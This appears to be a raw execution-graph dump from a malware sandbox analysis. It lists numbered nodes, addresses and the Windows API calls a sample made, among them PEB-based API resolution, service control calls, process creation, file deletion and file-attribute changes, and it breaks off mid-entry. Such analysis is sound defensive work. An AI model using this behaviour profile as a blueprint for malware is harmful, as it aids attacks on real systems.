                                                                                                                      execution_graph 5241 3781b7 5244 378679 5241->5244 5242 388519 GetPEB 5242->5244 5244->5242 5245 378f65 2 API calls 5244->5245 5246 3786e2 5244->5246 5247 38da22 GetPEB 5244->5247 5248 377ff2 2 API calls 5244->5248 5249 3786c6 5244->5249 5250 37b6cf GetPEB 5244->5250 5253 37b23c 2 API calls 5244->5253 5254 38c264 5244->5254 5258 38458f 5244->5258 5245->5244 5246->5246 5247->5244 5248->5244 5252 381e67 2 API calls 5249->5252 5250->5244 5252->5246 5253->5244 5255 38c291 5254->5255 5256 38aa30 GetPEB 5255->5256 5257 38c2dd 5256->5257 5257->5244 5259 3845a2 5258->5259 5260 38aa30 GetPEB 5259->5260 5261 384619 5260->5261 5261->5244 5262 374ee3 5263 37b6cf GetPEB 5262->5263 5264 375133 5263->5264 5265 37b23c 2 API calls 5264->5265 5266 37514c 5265->5266 5267 3751ad 5266->5267 5268 38dcf7 2 API calls 5266->5268 5269 375167 5268->5269 5270 3747ce GetPEB 5269->5270 5271 37518e 5270->5271 5272 37a8b0 GetPEB 5271->5272 5273 37519b 5272->5273 5274 381f8a 2 API calls 5273->5274 5274->5267 5275 371993 5276 3719dd 5275->5276 5277 38aa30 GetPEB 5276->5277 5278 371a3f 5277->5278 3982 37e991 3983 37ea62 3982->3983 3984 37ea8d 3982->3984 3988 37f8fd 3983->3988 3990 37fde0 3988->3990 3989 37ffd1 4008 37ab87 3989->4008 3990->3989 3993 37ea75 3990->3993 3998 38dcf7 RtlAllocateHeap GetPEB 3990->3998 3999 37a8b0 GetPEB 3990->3999 4004 37b23c 3990->4004 4018 3846bb 3990->4018 4022 38da22 3990->4022 4026 3747ce 3990->4026 4030 37f899 3990->4030 4033 374b61 3990->4033 3993->3984 4001 3793ed 3993->4001 3998->3990 3999->3990 4002 38aa30 GetPEB 4001->4002 4003 379456 ExitProcess 4002->4003 4003->3984 4005 37b254 4004->4005 4037 38aa30 4005->4037 4009 37abb0 4008->4009 4010 374b61 GetPEB 4009->4010 4011 37ad67 4010->4011 4067 377f5d 4011->4067 4013 37ada4 4013->3993 4014 37ad99 4014->4013 4071 381e67 4014->4071 4016 37adc4 4017 381e67 2 API calls 4016->4017 4017->4013 4019 3846da 4018->4019 4020 38aa30 GetPEB 4019->4020 4021 384729 SHGetFolderPathW 4020->4021 4021->3990 4023 38da3d 4022->4023 4075 38adc9 4023->4075 4027 3747f3 4026->4027 4079 37a42d 4027->4079 4031 38aa30 GetPEB 4030->4031 4032 37f8f4 4031->4032 4032->3990 4034 374b74 4033->4034 4082 371ea7 4034->4082 4038 38ab1d 4037->4038 4039 37b2b8 lstrcmpiW 4037->4039 4043 380a0e 4038->4043 4039->3990 4041 38ab33 4046 37cdcd 4041->4046 4050 384087 GetPEB 4043->4050 4045 380aa6 4045->4041 4047 37cdec 4046->4047 4048 37cf0f 4047->4048 4051 38be27 4047->4051 4048->4039 4050->4045 4052 38bfb1 4051->4052 4059 37ade6 4052->4059 4055 38bff5 4057 38c029 4055->4057 4058 37cdcd GetPEB 4055->4058 4057->4048 4058->4057 4060 37adfa 4059->4060 4061 38aa30 GetPEB 4060->4061 4062 37ae57 4061->4062 4062->4055 4063 38cadf 4062->4063 4064 38caf5 4063->4064 4065 38aa30 GetPEB 4064->4065 4066 38cb50 4065->4066 4066->4055 4068 377f8e 4067->4068 4069 38aa30 GetPEB 4068->4069 4070 377fd4 CreateProcessW 4069->4070 4070->4014 4072 381e7d 4071->4072 4073 38aa30 GetPEB 4072->4073 4074 381edb CloseHandle 4073->4074 4074->4016 4076 38adee 4075->4076 4077 38aa30 GetPEB 4076->4077 4078 38ae5d 4077->4078 4078->3990 4080 38aa30 GetPEB 4079->4080 4081 37480e 4080->4081 4081->3990 4083 371ebc 4082->4083 4086 37702c 4083->4086 4087 377049 4086->4087 4088 38aa30 GetPEB 4087->4088 4089 371f4c 4088->4089 4089->3990 4090 372950 4095 382550 4090->4095 4093 3793ed 2 API calls 4094 372a1a 4093->4094 4132 383775 4095->4132 4098 388519 GetPEB 4098->4132 4102 383ff6 4351 387dd5 4102->4351 4103 383fe1 4344 3791b0 4103->4344 4108 372a06 4108->4093 4113 383fbb 4333 38cb5b 4113->4333 4114 38e1d4 RtlAllocateHeap GetPEB 4114->4132 4129 387ba6 RtlAllocateHeap GetPEB 4129->4132 4132->4098 4132->4102 4132->4103 4132->4108 4132->4113 4132->4114 4132->4129 4133 37a8b0 GetPEB 4132->4133 4134 3820ba 4132->4134 4144 384116 4132->4144 4152 380326 4132->4152 4156 3759f2 4132->4156 4166 3895fa 4132->4166 4177 38044f 4132->4177 4191 385cc4 4132->4191 4204 3887d1 4132->4204 4209 3764e2 4132->4209 4219 38473c 4132->4219 4226 375361 4132->4226 4234 381ddd 4132->4234 4238 390056 4132->4238 4249 3866ca 4132->4249 4259 372251 4132->4259 4266 37b2c7 4132->4266 4278 381ee7 4132->4278 4281 389eec 4132->4281 4290 3751bb 4132->4290 4295 388be3 4132->4295 4299 37dff3 4132->4299 4306 387d48 4132->4306 4309 38d2ce 4132->4309 4314 378dc4 4132->4314 4318 376d24 4132->4318 4327 389bcf 4132->4327 4133->4132 4138 3823c3 4134->4138 4135 382503 4137 38da22 GetPEB 4135->4137 4141 382501 4137->4141 4138->4135 4140 3846bb 2 API calls 4138->4140 4138->4141 4365 388f9e 4138->4365 4369 37912c 4138->4369 4373 377ff2 4138->4373 4378 37a55f 4138->4378 4140->4138 4141->4132 4148 3843df 4144->4148 4149 38da22 GetPEB 4148->4149 4150 381e67 2 API calls 4148->4150 4151 384508 4148->4151 4400 379350 4148->4400 4404 378f65 4148->4404 4408 38c1ec 4148->4408 4149->4148 4150->4148 4151->4132 4153 380340 4152->4153 4154 38044a 4153->4154 4155 379011 RtlAllocateHeap GetPEB LoadLibraryW 4153->4155 4154->4132 4155->4153 4163 375caf 4156->4163 4157 375db3 4426 373c3c 4157->4426 4160 375db1 4160->4132 4161 38da22 GetPEB 4161->4163 4163->4157 4163->4160 4163->4161 4164 3747ce GetPEB 4163->4164 4412 3913ad 4163->4412 4436 38dcf7 4163->4436 4440 37a8b0 4163->4440 4164->4163 4172 3899cc 4166->4172 4168 38dcf7 2 API calls 4168->4172 4169 389ba9 4171 381e67 2 API calls 4169->4171 4170 389ba7 4170->4132 4171->4170 4172->4168 4172->4169 4172->4170 4173 378f65 2 API calls 4172->4173 4174 3747ce GetPEB 4172->4174 4175 37a8b0 GetPEB 4172->4175 4176 38c1ec GetPEB 4172->4176 4466 375ddd 4172->4466 4173->4172 4174->4172 4175->4172 4176->4172 4190 380859 4177->4190 4179 38dcf7 2 API calls 4179->4190 4180 3809d9 4182 388519 GetPEB 4180->4182 4181 380894 4478 37957d 4181->4478 4187 3809ec 4182->4187 4185 3808b3 4185->4132 4186 377ff2 RtlAllocateHeap GetPEB 4186->4190 4188 388519 GetPEB 4187->4188 4188->4185 4189 37a8b0 GetPEB 4189->4190 4190->4179 4190->4180 4190->4181 4190->4185 4190->4186 4190->4189 4470 379462 4190->4470 4474 380dd6 4190->4474 4200 3863a1 4191->4200 4192 388f9e 2 API calls 4192->4200 4194 38dcf7 2 API calls 4194->4200 4195 386521 4196 388f9e 2 API calls 4195->4196 4197 386543 4196->4197 4197->4132 4199 3846bb 2 API calls 4199->4200 4200->4192 4200->4194 4200->4195 4200->4197 4200->4199 4201 37912c 2 API calls 4200->4201 4203 37a8b0 GetPEB 4200->4203 4482 37d6d8 4200->4482 4495 371cec 4200->4495 4499 381652 4200->4499 4201->4200 4203->4200 4206 38888d 4204->4206 4207 388935 4206->4207 4522 37ee08 4206->4522 4526 38ab5e 4206->4526 4207->4132 4215 37651f 4209->4215 4211 388519 GetPEB 4211->4215 4213 374b61 GetPEB 4213->4215 4214 376bd9 4214->4132 4215->4211 4215->4213 4215->4214 4530 38a666 4215->4530 4540 38f435 4215->4540 4558 37cf47 4215->4558 4570 375548 4215->4570 4579 38e395 4215->4579 4222 384a28 4219->4222 4220 37912c 2 API calls 4220->4222 4221 384b7d 4221->4132 4222->4220 4222->4221 4223 388f9e GetPEB CloseServiceHandle 4222->4223 4225 3742c4 2 API calls 4222->4225 4744 37e249 4222->4744 4223->4222 4225->4222 4229 37537b 4226->4229 4227 388519 GetPEB 4227->4229 4228 377ff2 2 API calls 4228->4229 4229->4227 4229->4228 4231 37553e 4229->4231 4748 37960d 4229->4748 4752 390f33 4229->4752 4762 37924b 4229->4762 4231->4132 4235 381df2 4234->4235 4236 38aa30 GetPEB 4235->4236 4237 381e5c 4236->4237 4237->4132 4248 390720 4238->4248 4240 37cb52 GetPEB 4240->4248 4241 3846bb 2 API calls 4241->4248 4243 3909a3 4243->4132 4245 37a8b0 GetPEB 4245->4248 4246 38dcf7 RtlAllocateHeap GetPEB 4246->4248 4247 381652 GetPEB 4247->4248 4248->4240 4248->4241 4248->4243 4248->4245 4248->4246 4248->4247 4857 37f002 4248->4857 4861 37aad6 4248->4861 4865 371fd1 4248->4865 4869 385c73 4249->4869 4251 3913ad 2 API calls 4258 386a65 4251->4258 4252 38dcf7 RtlAllocateHeap GetPEB 4252->4258 4253 386bbb 4253->4132 4254 38d25e GetPEB 4254->4258 4255 3747ce GetPEB 4255->4258 4257 37a8b0 GetPEB 4257->4258 4258->4251 4258->4252 4258->4253 4258->4254 4258->4255 4258->4257 4872 38453f 4258->4872 4263 37227a 4259->4263 4260 372918 4261 390e3a GetPEB 4260->4261 4262 372916 4261->4262 4262->4132 4263->4260 4263->4262 4264 390e3a GetPEB 4263->4264 4265 377ff2 2 API calls 4263->4265 4264->4263 4265->4263 4271 37b2df 4266->4271 4267 377ff2 2 API calls 4267->4271 4271->4267 4275 37b6c2 4271->4275 4876 380b19 4271->4876 4883 380e53 4271->4883 4895 386df8 4271->4895 4916 384b87 4271->4916 4937 37f09b 4271->4937 4949 379714 4271->4949 4957 381889 4271->4957 4968 37b74d 4271->4968 4275->4132 4279 378dc4 GetPEB 4278->4279 4280 381f83 4279->4280 4280->4132 4287 38a152 4281->4287 4283 388519 GetPEB 4283->4287 4286 38a2de 4286->4132 4287->4283 4287->4286 4288 37f899 GetPEB 4287->4288 5081 37a9ce 4287->5081 5085 378ece 4287->5085 5089 374346 4287->5089 5096 374e7d 4287->5096 4288->4287 4291 375275 4290->4291 4293 3752b8 4291->4293 4294 377ff2 2 API calls 4291->4294 5104 380001 4291->5104 4293->4132 4294->4291 4297 388e25 4295->4297 4296 38d25e GetPEB 4296->4297 4297->4296 4298 388ef1 4297->4298 4298->4132 4300 37e1a7 4299->4300 4301 377ff2 2 API calls 4300->4301 4302 37e207 4300->4302 4304 37e205 4300->4304 5133 377af6 4300->5133 4301->4300 4303 3746be GetPEB 4302->4303 4303->4304 4304->4132 4307 377ff2 2 API calls 4306->4307 4308 387dc1 4307->4308 4308->4132 4310 385c73 GetPEB 4309->4310 4311 38d370 4310->4311 5137 388b55 4311->5137 4315 378ddd 4314->4315 4316 38aa30 GetPEB 4315->4316 4317 378e3e 4316->4317 4317->4132 4325 376f44 4318->4325 4319 376ffc 5141 379dcf 4319->5141 4320 37b6cf GetPEB 4320->4325 4322 376ffa 4322->4132 4323 38dcf7 2 API calls 4323->4325 4324 3747ce GetPEB 4324->4325 4325->4319 4325->4320 4325->4322 4325->4323 4325->4324 4326 37a8b0 GetPEB 4325->4326 4326->4325 4331 389d3b 4327->4331 4328 389e49 4328->4132 4329 37b6cf GetPEB 4329->4331 4331->4328 4331->4329 5164 3752c2 4331->5164 5167 379b83 4331->5167 4341 38cb83 4333->4341 4334 38dcf7 RtlAllocateHeap GetPEB 4334->4341 4335 38d0a6 4338 37ab87 3 API calls 4335->4338 4336 3846bb 2 API calls 4336->4341 4337 38d259 4337->4337 4339 38d0d0 4338->4339 4339->4108 4340 381652 GetPEB 4340->4341 4341->4334 4341->4335 4341->4336 4341->4337 4341->4340 4343 37a8b0 GetPEB 4341->4343 5205 38e32e 4341->5205 4343->4341 4345 3791be 4344->4345 4346 380da3 4345->4346 4347 388519 GetPEB 4345->4347 4348 378dc4 GetPEB 4345->4348 4349 389e56 GetPEB 4345->4349 4350 381e67 2 API calls 4345->4350 4346->4108 4347->4345 4348->4345 4349->4345 4350->4345 4364 388118 4351->4364 4353 388245 4353->4108 4354 38dcf7 2 API calls 4354->4364 4355 388247 4356 37b6cf GetPEB 4355->4356 4360 38825f 4356->4360 4357 3913ad 2 API calls 4357->4364 4358 38473c 4 API calls 4358->4364 4359 3747ce GetPEB 4359->4364 5225 37b1c6 4360->5225 4363 37a8b0 GetPEB 4363->4364 4364->4353 4364->4354 4364->4355 4364->4357 4364->4358 4364->4359 4364->4363 5209 373e3f 4364->5209 5218 386c49 4364->5218 4366 388fb3 4365->4366 4367 38aa30 GetPEB 4366->4367 4368 388ffc CloseServiceHandle 4367->4368 4368->4138 4370 379149 4369->4370 4371 38aa30 GetPEB 4370->4371 4372 3791a2 OpenSCManagerW 4371->4372 4372->4138 4385 371db9 4373->4385 4377 3780db 4377->4138 4384 37a73c 4378->4384 4380 37a7f0 4396 373bc0 4380->4396 4381 38da22 GetPEB 4381->4384 4383 37a7ee 4383->4138 4384->4380 4384->4381 4384->4383 4392 37cb52 4384->4392 4386 38aa30 GetPEB 4385->4386 4387 371e19 4386->4387 4388 371e22 4387->4388 4389 371e3d 4388->4389 4390 38aa30 GetPEB 4389->4390 4391 371e96 RtlAllocateHeap 4390->4391 4391->4377 4393 37cb6b 4392->4393 4394 38aa30 GetPEB 4393->4394 4395 37cbd4 4394->4395 4395->4384 4397 373bd8 4396->4397 4398 38aa30 GetPEB 4397->4398 4399 373c2d 4398->4399 4399->4383 4401 379371 4400->4401 4402 38aa30 GetPEB 4401->4402 4403 3793db 4402->4403 4403->4148 4405 378f90 4404->4405 4406 38aa30 GetPEB 4405->4406 4407 378ff5 CreateFileW 4406->4407 4407->4148 4409 38c1fb 4408->4409 4410 38aa30 GetPEB 4409->4410 4411 38c258 4410->4411 4411->4148 4413 3913cb 4412->4413 4414 374b61 GetPEB 4413->4414 4415 391621 4414->4415 4416 374b61 GetPEB 4415->4416 4417 391637 4416->4417 4418 374b61 GetPEB 4417->4418 4419 39164d 4418->4419 4420 373bc0 GetPEB 4419->4420 4421 391666 4420->4421 4422 373bc0 GetPEB 4421->4422 4423 391681 4422->4423 4444 374ddd 4423->4444 4425 3916bf 4425->4163 4427 373c56 4426->4427 4428 38dcf7 2 API calls 4427->4428 4429 373d7a 4428->4429 4448 37a918 4429->4448 4432 37a8b0 GetPEB 4433 373da2 4432->4433 4452 381f8a 4433->4452 4435 373db4 4435->4160 4437 38dd0c 4436->4437 4438 377ff2 2 API calls 4437->4438 4439 38dd93 4438->4439 4439->4163 4441 37a8c2 4440->4441 4456 388519 4441->4456 4445 374df6 4444->4445 4446 38aa30 GetPEB 4445->4446 4447 374e69 SHFileOperationW 4446->4447 4447->4425 4449 37a936 4448->4449 4450 37a42d GetPEB 4449->4450 4451 373d95 4450->4451 4451->4432 4453 381f99 4452->4453 4454 38aa30 GetPEB 4453->4454 4455 381fef DeleteFileW 4454->4455 4455->4435 4457 388529 4456->4457 4458 371db9 GetPEB 4457->4458 4459 3885ed 4458->4459 4462 37a30c 4459->4462 4463 37a326 4462->4463 4464 38aa30 GetPEB 4463->4464 4465 37a392 4464->4465 4465->4163 4467 375dff 4466->4467 4468 38aa30 GetPEB 4467->4468 4469 375e4f SetFileInformationByHandle 4468->4469 4469->4172 4471 379481 4470->4471 4472 38aa30 GetPEB 4471->4472 4473 3794da 4472->4473 4473->4190 4475 380df7 4474->4475 4476 38aa30 GetPEB 4475->4476 4477 380e3f 4476->4477 4477->4190 4479 379595 4478->4479 4480 38aa30 GetPEB 4479->4480 4481 3795ff 4480->4481 4481->4185 4491 37d70e 4482->4491 4483 388519 GetPEB 4483->4491 4484 37df52 4485 388519 GetPEB 4484->4485 4488 37df63 4485->4488 4488->4200 4490 377ff2 RtlAllocateHeap GetPEB 4490->4491 4491->4483 4491->4484 4491->4488 4491->4490 4494 388f9e 2 API calls 4491->4494 4503 3742c4 4491->4503 4507 382007 4491->4507 4511 3816af 4491->4511 4515 38d25e 4491->4515 4518 37df6f 4491->4518 4494->4491 4496 371d2d 4495->4496 4497 38aa30 GetPEB 4496->4497 4498 371d93 4497->4498 4498->4200 4500 381680 4499->4500 4501 37a42d GetPEB 4500->4501 4502 3816a7 4501->4502 4502->4200 4504 3742e2 4503->4504 4505 38aa30 GetPEB 4504->4505 4506 374335 OpenServiceW 4505->4506 4506->4491 4508 382033 4507->4508 4509 38aa30 GetPEB 4508->4509 4510 38209a 4509->4510 4510->4491 4512 3816f3 4511->4512 4513 38aa30 GetPEB 4512->4513 4514 38174d 4513->4514 4514->4491 4516 38aa30 GetPEB 4515->4516 4517 38d2c5 4516->4517 4517->4491 4519 37df8a 4518->4519 4520 38aa30 GetPEB 4519->4520 4521 37dfe1 4520->4521 4521->4491 4523 37ee1a 4522->4523 4524 38aa30 GetPEB 4523->4524 4525 37ee76 4524->4525 4525->4206 4527 38ab70 4526->4527 4528 38aa30 GetPEB 4527->4528 4529 38abc6 4528->4529 4529->4206 4538 38a8cb 4530->4538 4532 38dcf7 2 API calls 4532->4538 4533 38aa14 4536 388519 GetPEB 4533->4536 4534 37a42d GetPEB 4534->4538 4535 38aa12 4535->4215 4536->4535 4537 377ff2 2 API calls 4537->4538 4538->4532 4538->4533 4538->4534 4538->4535 4538->4537 4539 37a8b0 GetPEB 4538->4539 4596 374816 4538->4596 4539->4538 4556 38fc7c 4540->4556 4541 38ffc3 4542 388606 2 API calls 4541->4542 4543 38ffe0 4542->4543 4619 377f1d 4543->4619 4545 39003a 4548 388519 GetPEB 4545->4548 4547 38dcf7 2 API calls 4547->4556 4554 38ffb1 4548->4554 4549 377ff2 RtlAllocateHeap GetPEB 4549->4556 4551 37a42d GetPEB 4551->4556 4553 37a8b0 GetPEB 4553->4554 4554->4215 4556->4541 4556->4545 4556->4547 4556->4549 4556->4551 4556->4554 4557 37a8b0 GetPEB 4556->4557 4607 388606 4556->4607 4611 38c0c1 4556->4611 4615 37ed7e 4556->4615 4557->4556 4560 37cf7e 4558->4560 4561 388519 GetPEB 4560->4561 4565 37d58f 4560->4565 4566 37d5a6 4560->4566 4567 377ff2 2 API calls 4560->4567 4569 37ed7e GetPEB 4560->4569 4627 377735 4560->4627 4634 377e87 4560->4634 4638 38ae6d 4560->4638 4653 3770b3 4560->4653 4561->4560 4568 388519 GetPEB 4565->4568 4566->4215 4567->4560 4568->4566 4569->4560 4577 375577 4570->4577 4572 375969 4574 388519 GetPEB 4572->4574 4573 375967 4573->4215 4574->4573 4575 377ff2 2 API calls 4575->4577 4577->4572 4577->4573 4577->4575 4578 37ed7e GetPEB 4577->4578 4684 375e60 4577->4684 4690 37aefb 4577->4690 4578->4577 4580 38e406 4579->4580 4581 38f410 4580->4581 4583 38dcf7 2 API calls 4580->4583 4587 38f426 4580->4587 4590 37a8b0 GetPEB 4580->4590 4591 372b62 GetPEB 4580->4591 4593 388519 GetPEB 4580->4593 4595 379670 GetPEB 4580->4595 4700 38dac6 4580->4700 4704 3788c3 4580->4704 4708 3775fa 4580->4708 4712 38408e 4580->4712 4716 372ae4 4580->4716 4720 3909b5 4580->4720 4723 38a2e8 4580->4723 4732 372b62 4581->4732 4583->4580 4587->4215 4590->4580 4591->4580 4593->4580 4595->4580 4600 374836 4596->4600 4598 374b23 4599 38847f GetPEB 4598->4599 4601 374b21 4599->4601 4600->4598 4600->4601 4602 377ff2 2 API calls 4600->4602 4603 38847f 4600->4603 4601->4538 4602->4600 4604 3884a6 4603->4604 4605 38aa30 GetPEB 4604->4605 4606 388502 4605->4606 4606->4600 4608 38861f 4607->4608 4609 377ff2 2 API calls 4608->4609 4610 3886bc 4609->4610 4610->4556 4612 38c0e6 4611->4612 4613 37a42d GetPEB 4612->4613 4614 38c108 4613->4614 4614->4556 4616 37ed97 4615->4616 4623 387a71 4616->4623 4620 377f39 4619->4620 4621 37a42d GetPEB 4620->4621 4622 377f55 4621->4622 4622->4553 4624 387a8a 4623->4624 4625 38aa30 GetPEB 4624->4625 4626 37ee00 4625->4626 4626->4556 4630 377764 4627->4630 4628 377ff2 2 API calls 4628->4630 4629 377a10 4629->4560 4630->4628 4630->4629 4631 390e3a GetPEB 4630->4631 4632 3779f3 4630->4632 4631->4630 4660 390e3a 4632->4660 4635 377e9a 4634->4635 4636 37ed7e GetPEB 4635->4636 4637 377f16 4636->4637 4637->4560 4639 38aea5 4638->4639 4642 38baf7 4639->4642 4644 377ff2 2 API calls 4639->4644 4647 38baf5 4639->4647 4648 38dcf7 RtlAllocateHeap GetPEB 4639->4648 4649 379462 GetPEB 4639->4649 4650 388519 GetPEB 4639->4650 4652 37a8b0 GetPEB 4639->4652 4664 390b68 4639->4664 4668 387b05 4639->4668 4672 386bc6 4639->4672 4676 37a81d 4639->4676 4680 38828a 4639->4680 4643 37957d GetPEB 4642->4643 4643->4647 4644->4639 4647->4560 4648->4639 4649->4639 4650->4639 4652->4639 4654 3770dc 4653->4654 4655 385b3b GetPEB 4654->4655 4656 3774bb 4654->4656 4657 3774a7 4654->4657 4658 377ff2 2 API calls 4654->4658 4655->4654 4656->4560 4659 388519 GetPEB 4657->4659 4658->4654 4659->4656 4661 390e58 4660->4661 4662 37ed7e GetPEB 4661->4662 4663 390f24 4662->4663 4663->4629 4665 390b97 4664->4665 4666 38aa30 GetPEB 4665->4666 4667 390bfc 4666->4667 4667->4639 4669 387b37 4668->4669 4670 38aa30 GetPEB 4669->4670 4671 387b8a 4670->4671 4671->4639 4673 386bda 4672->4673 4674 38aa30 GetPEB 4673->4674 4675 386c3d 4674->4675 4675->4639 4677 37a83f 4676->4677 4678 38aa30 GetPEB 4677->4678 4679 37a89d 4678->4679 4679->4639 4681 3882a9 4680->4681 4682 38aa30 GetPEB 4681->4682 4683 388300 4682->4683 4683->4639 4685 375e82 4684->4685 4686 388519 GetPEB 4685->4686 4687 377ff2 2 API calls 4685->4687 4688 3764bd 4685->4688 4689 37ca90 GetPEB 4685->4689 4686->4685 4687->4685 4688->4577 4689->4685 4693 37af1c 4690->4693 4691 38ae6d 2 API calls 4691->4693 4692 37b0b3 4696 38e274 4692->4696 4693->4691 4693->4692 4694 37b0e8 4693->4694 4694->4577 4697 38e2a0 4696->4697 4698 38aa30 GetPEB 4697->4698 4699 38e312 4698->4699 4699->4694 4701 38dae5 4700->4701 4702 38aa30 GetPEB 4701->4702 4703 38db32 4702->4703 4703->4580 4705 3788f5 4704->4705 4706 38aa30 GetPEB 4705->4706 4707 378950 4706->4707 4707->4580 4709 37762c 4708->4709 4710 38aa30 GetPEB 4709->4710 4711 377690 4710->4711 4711->4580 4713 3840b3 4712->4713 4714 38aa30 GetPEB 4713->4714 4715 384103 4714->4715 4715->4580 4717 372b04 4716->4717 4718 38aa30 GetPEB 4717->4718 4719 372b4b 4718->4719 4719->4580 4736 3794ee 4720->4736 4724 38a519 4723->4724 4726 38a634 4724->4726 4729 377ff2 RtlAllocateHeap GetPEB 4724->4729 4730 37ed7e GetPEB 4724->4730 4731 388519 GetPEB 4724->4731 4740 38c032 4724->4740 4727 38a64a 4726->4727 4728 388519 GetPEB 4726->4728 4727->4580 4728->4727 4729->4724 4730->4724 4731->4724 4733 372b77 4732->4733 4734 38aa30 GetPEB 4733->4734 4735 372bce 4734->4735 4735->4587 4737 379511 4736->4737 4738 38aa30 GetPEB 4737->4738 4739 379566 4738->4739 4739->4580 4741 38c054 4740->4741 4742 38aa30 GetPEB 4741->4742 4743 38c0ae 4742->4743 4743->4724 4745 37e262 4744->4745 4746 38aa30 GetPEB 4745->4746 4747 37e2c1 4746->4747 4747->4222 4749 379623 4748->4749 4766 388315 4749->4766 4755 3911d1 4752->4755 4753 38dcf7 2 API calls 4753->4755 4754 381652 GetPEB 4754->4755 4755->4753 4755->4754 4756 377ff2 2 API calls 4755->4756 4757 37a8b0 GetPEB 4755->4757 4758 391380 4755->4758 4761 391391 4755->4761 4853 387ba6 4755->4853 4756->4755 4757->4755 4760 388519 GetPEB 4758->4760 4760->4761 4761->4229 4763 3792c1 4762->4763 4764 3792ac 4762->4764 4763->4229 4764->4763 4765 388519 GetPEB 4764->4765 4765->4764 4772 38832d 4766->4772 4768 38845c 4771 388519 GetPEB 4768->4771 4770 37966a 4770->4229 4771->4770 4772->4768 4772->4770 4773 377ff2 2 API calls 4772->4773 4775 37bb7e 4772->4775 4792 374bc7 4772->4792 4797 38907f 4772->4797 4773->4772 4791 37c63d 4775->4791 4779 38dcf7 RtlAllocateHeap GetPEB 4779->4791 4780 37ca5b 4781 37957d GetPEB 4780->4781 4783 37ca59 4781->4783 4782 37a958 GetPEB 4782->4791 4783->4772 4786 379462 GetPEB 4786->4791 4788 37a8b0 GetPEB 4788->4791 4789 37ed7e GetPEB 4789->4791 4791->4779 4791->4780 4791->4782 4791->4783 4791->4786 4791->4788 4791->4789 4806 37aa4d 4791->4806 4810 37b144 4791->4810 4814 371c45 4791->4814 4818 384624 4791->4818 4822 3792c7 4791->4822 4826 38ca69 4791->4826 4830 372bd9 4791->4830 4793 38ca69 GetPEB 4792->4793 4794 374c44 4793->4794 4795 388519 GetPEB 4794->4795 4796 374c57 4795->4796 4796->4772 4805 38947b 4797->4805 4798 38dcf7 RtlAllocateHeap GetPEB 4798->4805 4799 3895cb 4800 37957d GetPEB 4799->4800 4801 3895c9 4800->4801 4801->4772 4802 37aa4d GetPEB 4802->4805 4803 37a8b0 GetPEB 4803->4805 4804 379462 GetPEB 4804->4805 4805->4798 4805->4799 4805->4801 4805->4802 4805->4803 4805->4804 4807 37aa76 4806->4807 4808 38aa30 GetPEB 4807->4808 4809 37aab9 4808->4809 4809->4791 4811 37b15f 4810->4811 4812 38aa30 GetPEB 4811->4812 4813 37b1b8 4812->4813 4813->4791 4815 371c76 4814->4815 4816 38aa30 GetPEB 4815->4816 4817 371cd0 4816->4817 4817->4791 4819 384646 4818->4819 4820 38aa30 GetPEB 4819->4820 4821 3846a8 4820->4821 4821->4791 4823 3792e5 4822->4823 4824 38aa30 GetPEB 4823->4824 4825 37933c 4824->4825 4825->4791 4827 38ca7b 4826->4827 4828 38aa30 GetPEB 4827->4828 4829 38cad4 4828->4829 4829->4791 4831 373757 4830->4831 4832 373a7d 4831->4832 4833 377ff2 2 API calls 4831->4833 4834 388519 GetPEB 4831->4834 4836 373bbb 4831->4836 4838 37cb52 GetPEB 4831->4838 4839 379462 GetPEB 4831->4839 4840 38dcf7 RtlAllocateHeap GetPEB 4831->4840 4843 390b68 GetPEB 4831->4843 4844 37a8b0 GetPEB 4831->4844 4845 38d84c 4831->4845 4849 378d13 4831->4849 4835 37957d GetPEB 4832->4835 4833->4831 4834->4831 4837 373aa2 4835->4837 4836->4836 4837->4791 4838->4831 4839->4831 4840->4831 4843->4831 4844->4831 4846 38d87f 4845->4846 4847 38aa30 GetPEB 4846->4847 4848 38d8ca 4847->4848 4848->4831 4850 378d41 4849->4850 4851 38aa30 GetPEB 4850->4851 4852 378da7 4851->4852 4852->4831 4854 387bbf 4853->4854 4855 377ff2 2 API calls 4854->4855 4856 387c88 4855->4856 4856->4755 4858 37f02e 4857->4858 4859 38aa30 GetPEB 4858->4859 4860 37f082 4859->4860 4860->4248 4862 37ab09 4861->4862 4863 38aa30 GetPEB 4862->4863 4864 37ab6d 4863->4864 4864->4248 4866 371fe3 4865->4866 4867 38aa30 GetPEB 4866->4867 4868 372045 4867->4868 4868->4248 4870 38aa30 GetPEB 4869->4870 4871 385cbb 4870->4871 4871->4258 4873 384567 4872->4873 4874 37a42d GetPEB 4873->4874 4875 384587 4874->4875 4875->4258 4881 380d2c 4876->4881 4877 380da3 4877->4271 4878 388519 GetPEB 4878->4881 4879 378dc4 GetPEB 4879->4881 4881->4877 4881->4878 4881->4879 4882 381e67 2 API calls 4881->4882 4976 389e56 4881->4976 4882->4881 4888 38144a 4883->4888 4884 3846bb 2 API calls 4884->4888 4885 381647 4885->4271 4886 38da22 GetPEB 4886->4888 4888->4884 4888->4885 4888->4886 4890 37ab87 3 API calls 4888->4890 4891 38dcf7 RtlAllocateHeap GetPEB 4888->4891 4892 3747ce GetPEB 4888->4892 4893 37a8b0 GetPEB 4888->4893 4984 37b6cf 4888->4984 4988 378969 4888->4988 4992 37ea99 4888->4992 4890->4888 4891->4888 4892->4888 4893->4888 4911 387703 4895->4911 4897 38d2ce GetPEB 4897->4911 4899 381e67 CloseHandle GetPEB 4899->4911 4901 387759 4903 37ab87 3 API calls 4901->4903 4902 38da22 GetPEB 4902->4911 4904 387789 4903->4904 4906 381e67 2 API calls 4904->4906 4912 3877d7 4904->4912 4905 37b6cf GetPEB 4905->4911 4908 3877b2 4906->4908 4907 378969 GetPEB 4907->4911 4910 381e67 2 API calls 4908->4910 4909 38dcf7 2 API calls 4909->4911 4910->4912 4911->4897 4911->4899 4911->4901 4911->4902 4911->4905 4911->4907 4911->4909 4911->4912 4913 3747ce GetPEB 4911->4913 4914 37a8b0 GetPEB 4911->4914 4915 37ea99 3 API calls 4911->4915 5003 38bb23 4911->5003 5010 373de2 4911->5010 5013 38d389 4911->5013 4912->4271 4913->4911 4914->4911 4915->4911 5043 387cdb 4916->5043 4918 37ab87 3 API calls 4934 38570e 4918->4934 4919 385b08 4922 381e67 2 API calls 4919->4922 4920 374816 2 API calls 4920->4934 4921 3846bb 2 API calls 4921->4934 4923 385b06 4922->4923 4923->4271 4924 38da22 GetPEB 4924->4934 4925 388519 GetPEB 4925->4934 4927 37cb52 GetPEB 4927->4934 4928 37b6cf GetPEB 4928->4934 4929 38dcf7 RtlAllocateHeap GetPEB 4929->4934 4931 378969 GetPEB 4931->4934 4932 